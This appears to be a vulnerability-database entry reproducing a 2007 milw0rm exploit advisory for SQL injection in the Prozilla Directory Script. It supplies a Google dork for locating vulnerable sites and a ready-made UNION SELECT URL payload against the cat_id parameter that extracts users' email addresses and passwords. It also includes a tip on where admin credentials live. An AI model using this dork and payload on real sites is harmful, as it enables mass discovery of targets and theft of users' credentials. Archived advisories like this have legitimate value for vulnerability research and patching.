Prozilla Directory Script (directory.php cat_id) SQL Injection Vulnerbility

2014-07-01T00:00:00
ID SSV:64803
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                --==+================================================================================+==--
--==+		      Prozilla Directory Script SQL Injection Vulnerbility               +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://www.prozilla.com/
DORK: allinurl:directory.php?ax=list


DESCRIPTION: 
SQL injection in cat_id of directory.php among others. Able to retrieve email/passwords
of users who posted URLs in the directory.


EXPLOITS:
http://www.site.com/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(0x2D2D3E,email,0x3a,password),6,7,8,9,10,0x223E3C212D2D,12,13/**/from/**/links/*


NOTE/TIP: 
Doesnt look like admin info is stored in the database, must be config.


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !


--==+================================================================================+==--
--==+		      Prozilla Directory Script SQL Injection Vulnerbility               +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-14]